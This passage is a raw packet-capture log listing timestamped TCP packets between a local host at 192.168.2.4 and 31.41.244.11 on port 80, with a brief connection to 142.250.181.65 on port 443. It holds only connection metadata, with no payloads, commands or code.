Dec 22, 2024 02:16:51.620896101 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.620965958 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.621016979 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.621057987 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.622158051 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.622199059 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.622261047 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.622301102 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.623388052 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.623430967 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.623507977 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.623547077 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.624648094 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.624689102 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.624773026 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.624815941 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.625847101 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.625893116 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.625911951 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.625948906 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.627099991 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.627147913 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.627237082 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.627280951 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.628268003 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.628325939 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.628381014 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.628422976 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.629491091 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.629540920 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.630032063 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.630084038 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.630670071 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.630713940 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.630733967 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.630774975 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.631854057 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.631894112 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.631953955 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.631994009 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.633006096 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.633044004 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.633105993 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.633167028 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.634151936 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.634195089 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.634264946 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.634300947 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.635343075 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.635387897 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.635457039 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.635504007 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.636462927 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.636514902 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.636542082 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.636585951 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.637593031 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.637641907 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.637715101 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.637756109 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.638715982 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.638757944 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.638828993 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.638868093 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.639888048 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.639928102 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.640014887 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.640049934 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.640947104 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.640991926 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.641028881 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.641072035 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.642056942 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.642106056 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.642111063 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.642143965 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.643137932 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.643220901 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.643265009 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.643307924 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.644237995 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.644279003 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.644300938 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.644341946 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.645311117 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.645349026 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.645399094 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.645442009 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.646388054 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.646506071 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.646543980 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.646584988 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.647428989 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.647469044 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.647543907 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.647582054 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.648468018 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.648516893 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.648597002 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.648638010 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.649545908 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.649590015 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.649652004 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.649693966 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.650561094 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.650616884 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.650666952 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.650715113 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.651618958 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.651659966 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.651731968 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.651772976 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.652625084 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.652666092 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.652750015 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.652790070 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.653614044 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.653681993 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.653717995 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.653759003 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.654726028 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.654769897 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.654822111 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.654860973 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.655642033 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.655682087 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.655728102 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.655770063 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.656646013 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.656686068 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.656759024 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.656799078 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.657645941 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.657685041 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.657721996 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.657763958 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.658643961 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.658689022 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.658706903 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.658746004 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.659598112 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.659638882 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.659687996 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.659730911 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.660624981 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.660661936 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.660712004 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.660752058 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.661595106 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.661639929 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.662014008 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.662059069 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.662544012 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.662590027 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.662676096 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.662714005 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.663522005 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.663573027 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.663623095 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.663686037 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.664546967 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.664591074 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.664731979 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.664772987 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.665497065 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.665540934 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.665580034 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.665616989 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.666450024 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.666497946 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.666562080 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.666608095 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.667423964 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.667467117 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.667517900 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.667561054 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.668415070 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.668458939 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.668500900 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.668544054 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.669291973 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.669332981 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.669353962 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.669389009 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.670160055 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.670211077 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.670293093 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.670341015 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.671049118 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.671094894 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.671235085 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.671281099 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.671938896 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.671977997 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.672058105 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.672103882 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.672805071 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.672847033 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.672864914 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.672908068 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.673675060 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.673749924 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.673775911 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.673816919 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.674525023 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.674566031 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.674639940 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.674683094 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.675395012 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.675441027 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.675494909 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.675539017 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.676233053 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.676280022 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.676330090 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.676373005 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.677083969 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.677128077 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.677184105 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.677226067 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.677962065 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.678006887 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.678286076 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.678330898 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.678858995 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.678899050 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.678930044 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.678972006 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.679614067 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.679656982 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.679714918 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.679759026 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.680490971 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.680536032 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.680588961 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.680635929 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.681293964 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.681366920 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.681416035 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.681483984 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.682116032 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.682192087 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.682235003 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.682313919 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.682943106 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.683016062 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.683051109 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.683137894 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.683808088 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.683881998 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.683945894 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.684010983 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.684601068 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.684676886 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.684700966 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.684753895 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.685396910 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.685472012 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.685476065 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.685559988 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.686204910 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.686283112 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.686330080 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.686413050 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.687037945 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.687107086 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.687243938 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.687323093 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.687983990 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.688050985 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.688108921 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.688178062 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.688627005 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.688694954 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.688730955 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.688818932 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.689419985 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.689485073 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.689521074 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.689610004 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.690207005 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.690278053 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.690320969 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.690406084 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.690989017 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.691030979 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.691082001 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.691119909 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.691792011 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.691833019 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.691947937 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.691987038 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.692681074 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.692722082 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.692770004 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.692809105 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.694374084 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.694416046 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.694464922 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.694528103 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.695930958 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.695945978 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.695974112 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.695985079 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.697518110 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.697572947 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.697583914 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.697623014 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.699228048 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.699287891 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.699345112 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.699384928 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.700781107 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.700835943 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.700866938 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.700907946 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.702286959 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.702341080 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.702384949 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.702426910 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.703931093 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.703978062 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.704030037 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.704071045 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.705539942 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.705615997 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.705666065 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.705709934 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.705934048 CET	49882	443	192.168.2.4	142.250.181.65
Dec 22, 2024 02:16:51.705945015 CET	443	49882	142.250.181.65	192.168.2.4
Dec 22, 2024 02:16:51.706006050 CET	49882	443	192.168.2.4	142.250.181.65
Dec 22, 2024 02:16:51.707010984 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.707068920 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.707078934 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.707117081 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.708522081 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.708580971 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.708633900 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:51.708678007 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:51.710124969 CET	80	49872	31.41.244.11	192.168.2.4
